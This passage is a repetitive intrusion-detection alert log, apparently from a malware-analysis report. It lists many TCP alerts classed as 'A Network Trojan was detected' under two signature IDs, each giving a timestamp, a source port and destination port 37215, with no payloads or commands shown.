                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.615258
                SID:2829579
                Source Port:55942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276786
                SID:2835222
                Source Port:41654
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721673
                SID:2829579
                Source Port:37358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.851336
                SID:2835222
                Source Port:34274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.228202
                SID:2829579
                Source Port:58852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571549
                SID:2835222
                Source Port:35298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362560
                SID:2829579
                Source Port:41986
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419484
                SID:2829579
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.045012
                SID:2829579
                Source Port:40724
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.083159
                SID:2829579
                Source Port:42454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975014
                SID:2835222
                Source Port:59946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.465534
                SID:2829579
                Source Port:43070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961904
                SID:2835222
                Source Port:55978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.419887
                SID:2829579
                Source Port:36842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.500290
                SID:2829579
                Source Port:36134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.964533
                SID:2835222
                Source Port:34860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910370
                SID:2829579
                Source Port:46602
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.871585
                SID:2829579
                Source Port:49624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.570123
                SID:2835222
                Source Port:34722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687129
                SID:2835222
                Source Port:48796
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.716983
                SID:2829579
                Source Port:50606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.767456
                SID:2835222
                Source Port:60740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.905052
                SID:2835222
                Source Port:34266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836501
                SID:2829579
                Source Port:56940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.779286
                SID:2835222
                Source Port:46694
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.417834
                SID:2835222
                Source Port:59010
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518056
                SID:2835222
                Source Port:51044
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626890
                SID:2835222
                Source Port:55740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872473
                SID:2835222
                Source Port:44672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.786957
                SID:2835222
                Source Port:51502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675264
                SID:2829579
                Source Port:60896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.208019
                SID:2829579
                Source Port:52078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215377
                SID:2835222
                Source Port:57200
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.664587
                SID:2835222
                Source Port:37888
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989950
                SID:2835222
                Source Port:59206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.218075
                SID:2835222
                Source Port:42730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.079085
                SID:2835222
                Source Port:35882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.630634
                SID:2835222
                Source Port:46450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.269613
                SID:2829579
                Source Port:37998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799420
                SID:2829579
                Source Port:50710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328043
                SID:2835222
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225499
                SID:2829579
                Source Port:51058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.836278
                SID:2835222
                Source Port:48126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716130
                SID:2835222
                Source Port:44014
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140813
                SID:2835222
                Source Port:51398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071497
                SID:2829579
                Source Port:53652
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935144
                SID:2829579
                Source Port:49668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.266457
                SID:2829579
                Source Port:52780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.779672
                SID:2829579
                Source Port:50898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180695
                SID:2835222
                Source Port:34870
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.613914
                SID:2829579
                Source Port:44022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.165208
                SID:2835222
                Source Port:48322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659757
                SID:2829579
                Source Port:52346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782451
                SID:2829579
                Source Port:49062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.507423
                SID:2835222
                Source Port:42944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362891
                SID:2835222
                Source Port:42006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015785
                SID:2835222
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178892
                SID:2829579
                Source Port:45688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.448918
                SID:2835222
                Source Port:33288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.234025
                SID:2835222
                Source Port:38934
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618728
                SID:2835222
                Source Port:41738
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.586325
                SID:2835222
                Source Port:56630
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.654648
                SID:2835222
                Source Port:44116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.397178
                SID:2835222
                Source Port:57130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282932
                SID:2829579
                Source Port:47110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943641
                SID:2835222
                Source Port:44368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215672
                SID:2829579
                Source Port:35292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.517879
                SID:2829579
                Source Port:56000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362484
                SID:2829579
                Source Port:60782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532880
                SID:2835222
                Source Port:42830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860705
                SID:2835222
                Source Port:39656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163423
                SID:2829579
                Source Port:47626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141232
                SID:2835222
                Source Port:41626
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.584110
                SID:2835222
                Source Port:54972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587188
                SID:2835222
                Source Port:41148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.972212
                SID:2829579
                Source Port:43254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.324521
                SID:2829579
                Source Port:56430
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.329070
                SID:2835222
                Source Port:51802
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359727
                SID:2835222
                Source Port:49286
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568308
                SID:2835222
                Source Port:54254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659466
                SID:2835222
                Source Port:50672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.659722
                SID:2829579
                Source Port:45860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.997712
                SID:2829579
                Source Port:34878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971719
                SID:2835222
                Source Port:39516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422498
                SID:2829579
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136780
                SID:2829579
                Source Port:44106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807250
                SID:2835222
                Source Port:51074
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.563388
                SID:2829579
                Source Port:49842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.179808
                SID:2835222
                Source Port:55290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701368
                SID:2835222
                Source Port:33386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.430839
                SID:2835222
                Source Port:56374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.136823
                SID:2829579
                Source Port:58732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815573
                SID:2829579
                Source Port:54272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943022
                SID:2835222
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.685788
                SID:2835222
                Source Port:53954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.281686
                SID:2829579
                Source Port:53774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.805938
                SID:2835222
                Source Port:50056
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.166167
                SID:2829579
                Source Port:54198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885948
                SID:2829579
                Source Port:34674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.561889
                SID:2829579
                Source Port:50076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.701399
                SID:2835222
                Source Port:47898
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.587546
                SID:2829579
                Source Port:34058
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842192
                SID:2835222
                Source Port:50734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763171
                SID:2829579
                Source Port:53656
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944945
                SID:2835222
                Source Port:51740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.446651
                SID:2829579
                Source Port:43298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281662
                SID:2835222
                Source Port:57686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.141068
                SID:2835222
                Source Port:44936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.285657
                SID:2835222
                Source Port:40112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175469
                SID:2829579
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.023370
                SID:2835222
                Source Port:42628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864534
                SID:2835222
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.910321
                SID:2829579
                Source Port:54650
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763411
                SID:2835222
                Source Port:46952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162803
                SID:2829579
                Source Port:53050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867923
                SID:2829579
                Source Port:38924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.982043
                SID:2835222
                Source Port:55082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.984883
                SID:2835222
                Source Port:47438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.644847
                SID:2829579
                Source Port:41944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.912312
                SID:2835222
                Source Port:60976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.816790
                SID:2829579
                Source Port:45192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.076416
                SID:2829579
                Source Port:33002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883702
                SID:2835222
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.009600
                SID:2835222
                Source Port:35578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675133
                SID:2829579
                Source Port:34138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.985973
                SID:2835222
                Source Port:58426
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815991
                SID:2835222
                Source Port:60410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.212922
                SID:2829579
                Source Port:54384
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135938
                SID:2829579
                Source Port:40824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.182197
                SID:2835222
                Source Port:55798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789535
                SID:2835222
                Source Port:33636
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181793
                SID:2829579
                Source Port:38302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.786674
                SID:2829579
                Source Port:37404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237402
                SID:2829579
                Source Port:60162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362832
                SID:2835222
                Source Port:60902
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.526917
                SID:2835222
                Source Port:58080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945256
                SID:2835222
                Source Port:42840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.853629
                SID:2835222
                Source Port:59858
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.282332
                SID:2829579
                Source Port:41978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461846
                SID:2835222
                Source Port:47248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509898
                SID:2835222
                Source Port:56284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.873525
                SID:2829579
                Source Port:35584
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.230955
                SID:2829579
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.626960
                SID:2835222
                Source Port:48002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993698
                SID:2829579
                Source Port:45460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.463922
                SID:2829579
                Source Port:58516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559510
                SID:2829579
                Source Port:60064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.684022
                SID:2829579
                Source Port:48746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380865
                SID:2835222
                Source Port:35732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763140
                SID:2829579
                Source Port:51848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470225
                SID:2829579
                Source Port:33774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.675147
                SID:2829579
                Source Port:36016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.162165
                SID:2835222
                Source Port:48512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.629278
                SID:2829579
                Source Port:38248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532379
                SID:2829579
                Source Port:58084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369642
                SID:2835222
                Source Port:58028
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.272056
                SID:2829579
                Source Port:39790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.807648
                SID:2835222
                Source Port:41808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.461914
                SID:2835222
                Source Port:60590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858203
                SID:2829579
                Source Port:46416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899362
                SID:2835222
                Source Port:39294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.421807
                SID:2835222
                Source Port:45198
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.041282
                SID:2835222
                Source Port:54336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.852583
                SID:2829579
                Source Port:33160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.720180
                SID:2829579
                Source Port:39866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765680
                SID:2829579
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909921
                SID:2829579
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931166
                SID:2829579
                Source Port:50000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.802342
                SID:2835222
                Source Port:37892
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.866440
                SID:2835222
                Source Port:53354
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.435306
                SID:2835222
                Source Port:41910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359622
                SID:2835222
                Source Port:52402
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.288231
                SID:2835222
                Source Port:60536
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.170300
                SID:2835222
                Source Port:57672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.943574
                SID:2835222
                Source Port:34544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773493
                SID:2829579
                Source Port:42272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.962364
                SID:2835222
                Source Port:49734
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.651826
                SID:2835222
                Source Port:59544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728803
                SID:2835222
                Source Port:53266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.392551
                SID:2829579
                Source Port:53744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.611094
                SID:2835222
                Source Port:56370
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.422209
                SID:2835222
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359434
                SID:2829579
                Source Port:53464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.950347
                SID:2829579
                Source Port:55240
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.961970
                SID:2829579
                Source Port:49034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.900366
                SID:2829579
                Source Port:53254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072559
                SID:2829579
                Source Port:57088
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667917
                SID:2829579
                Source Port:40924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.728577
                SID:2829579
                Source Port:50962
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948504
                SID:2829579
                Source Port:45768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024738
                SID:2835222
                Source Port:48448
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667959
                SID:2835222
                Source Port:43172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155137
                SID:2835222
                Source Port:38158
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990402
                SID:2829579
                Source Port:50708
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.670637
                SID:2829579
                Source Port:55090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074467
                SID:2829579
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.173931
                SID:2835222
                Source Port:49624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
